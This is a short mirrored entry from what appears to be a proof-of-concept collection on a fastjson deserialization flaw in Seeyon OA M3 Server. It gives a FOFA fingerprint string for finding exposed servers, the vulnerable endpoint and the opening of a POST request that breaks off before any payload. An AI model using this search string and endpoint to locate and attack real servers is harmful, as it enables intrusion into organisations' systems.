mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
500 B
500 B
致远OA M3 Server 反序列化漏洞
fofa
"M3-Server 已启动"
根据群友说,这个漏洞是fastjson反序列化
poc
POST /mobile_portal/api/pns/message/send/batch/6_1sp1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencod
##漏洞分析
https://mp.weixin.qq.com/s/czbhaf7jpNmgjAt-OFWmIA